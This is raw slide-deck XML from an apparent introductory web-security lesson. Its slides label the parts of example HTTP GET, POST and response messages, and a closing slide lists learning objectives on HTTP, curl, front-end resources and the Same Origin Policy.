                <a:sym typeface="Roboto Mono Medium"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.target-server.com</a:t>
            </a:r>
            <a:endParaRPr sz="1800" u="sng">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Medium"/>
              <a:ea typeface="Roboto Mono Medium"/>
              <a:cs typeface="Roboto Mono Medium"/>
              <a:sym typeface="Roboto Mono Medium"/>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150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Connection: keep-alive</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Upgrade-Insecure-Requests: 1</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Accept: text/js, text/html, */*</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Accept-Language: en-us</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Accept-Encoding: gzip, deflate</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User-Agent: Mozilla/4.0</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800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191" name="Google Shape;1191;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986975" y="1515825"/>
            <a:ext cx="913200" cy="2714400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 12279" name="adj1"/>
              <a:gd fmla="val 50863"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highlight>
                <a:srgbClr val="F1C232"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192" name="Google Shape;1192;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6020775" y="2704650"/>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Headers</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5459875" y="982125"/>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Request Line</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5459875" y="4307025"/>
            <a:ext cx="30405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White Space</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>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69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277075" y="764775"/>
            <a:ext cx="8312700" cy="4101000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="43434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0C343D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requests with Query Params</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0C343D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201" name="Google Shape;1201;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2" name="Google Shape;1202;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476500" y="1143425"/>
            <a:ext cx="4675200" cy="3163500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="0"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GET /articles?tag=latest&amp;author=jane HTTP/1.1</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Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.target-server.com</a:t>
            </a:r>
            <a:endParaRPr sz="1800" u="sng">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Medium"/>
              <a:ea typeface="Roboto Mono Medium"/>
              <a:cs typeface="Roboto Mono Medium"/>
              <a:sym typeface="Roboto Mono Medium"/>
              <a:hlinkClick r:id="rId5"/>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Connection: keep-alive</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Upgrade-Insecure-Requests: 1</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Accept: text/html, */*</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Accept-Language: en-us</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Accept-Encoding: gzip, deflate</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Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>User-Agent: Mozilla/4.0</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800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Medium"/>
              <a:ea typeface="Roboto Mono Medium"/>
              <a:cs typeface="Roboto Mono Medium"/>
              <a:sym typeface="Roboto Mono Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1203" name="Google Shape;1203;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986975" y="1515825"/>
            <a:ext cx="913200" cy="2714400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 12279" name="adj1"/>
              <a:gd fmla="val 50863"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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6020775" y="2704650"/>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Headers</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205" name="Google Shape;1205;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5459875" y="982125"/>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Request Line</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206" name="Google Shape;1206;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5459875" y="4307025"/>
            <a:ext cx="30405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White Space</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Robot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70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277075" y="764775"/>
            <a:ext cx="8312700" cy="4101000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="43434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60000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anatomy of a POST Request</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="660000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1213" name="Google Shape;121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4" name="Google Shape;1214;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276400" y="982125"/>
            <a:ext cx="5287800" cy="3267000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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POST /api/users HTTP/1.1</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Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.target-server.com</a:t>
            </a:r>
            <a:endParaRPr sz="1800" u="sng">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Medium"/>
              <a:ea typeface="Roboto Mono Medium"/>
              <a:cs typeface="Roboto Mono Medium"/>
              <a:sym typeface="Roboto Mono Medium"/>
              <a:hlinkClick r:id="rId5"/>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User-Agent: Mozilla/4.0</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Accept: */*</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Content-Length: 23</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Content-Type: application/x-www-form-urlencoded</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username=Jane+Doe&amp;password=p455</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t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986975" y="1515825"/>
            <a:ext cx="913200" cy="1856100"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 12279" name="adj1"/>
              <a:gd fmla="val 50863"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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6020775" y="2362200"/>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Headers</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5459875" y="982125"/>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Request Line</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1218" name="Google Shape;1218;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5459875" y="3371913"/>
            <a:ext cx="30405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White Space</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1219" name="Google Shape;1219;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986975" y="3877425"/>
            <a:ext cx="593100" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 12279" name="adj1"/>
              <a:gd fmla="val 48908"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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680450" y="3877425"/>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Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t> Body</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Robot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71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277075" y="764775"/>
            <a:ext cx="8312700" cy="4101000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="43434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660000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anatomy of an HTTP Response</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="660000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1227" name="Google Shape;1227;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8" name="Google Shape;1228;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276400" y="1143525"/>
            <a:ext cx="5287800" cy="3163500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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HTTP/1.1 200 OK</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Date: Nov 12 02:12:12 2018</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Server: Apache/2.4.7 (Ubuntu)</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X-Powered-By: PHP/5.5.9-lubuntu4.21</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Cache-Control: no-cache</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Set-Cookie: SESSID=8toks; httponly</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Content-Encoding: gzip</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Content-Length: 698</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function getStats(event) {</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>  …</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0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Medium"/>
              <a:ea typeface="Roboto Mono Medium"/>
              <a:cs typeface="Roboto Mono Medium"/>
              <a:sym typeface="Roboto Mono Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Medium"/>
              <a:ea typeface="Roboto Mono Medium"/>
              <a:cs typeface="Roboto Mono Medium"/>
              <a:sym typeface="Roboto Mono Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986975" y="1598325"/>
            <a:ext cx="913200" cy="1965900"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 12279" name="adj1"/>
              <a:gd fmla="val 50863"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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6020775" y="2362200"/>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Headers</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5459875" y="1143525"/>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Status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t> Line</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232" name="Google Shape;1232;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5459875" y="3564225"/>
            <a:ext cx="3040500" cy="3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White Space</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1233" name="Google Shape;1233;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986975" y="3973588"/>
            <a:ext cx="593100" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 12279" name="adj1"/>
              <a:gd fmla="val 48908" name="adj2"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5692475" y="3973588"/>
            <a:ext cx="3040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B0F0"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Response Body</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>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031" name="Google Shape;1031;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032" name="Google Shape;1032;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3" name="Google Shape;1033;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9436800" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="☐"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discuss how the threat landscape </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is growing due to the web.</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the network structure of the internet.</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the components of HTTP requests and responses.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Use the curl command to send the HTTP requests via the command line and interpret the contents of the resp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onses</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="☐"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Distinguish between HTML, CSS, and Javascript within the context of front-end resources</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="☐"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inspect the major features of an HTML document</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="☐"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discuss Same Origin Policy and why it matters in a security context</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="☐"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use the Network Inspector tool to analyze requests and responses</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
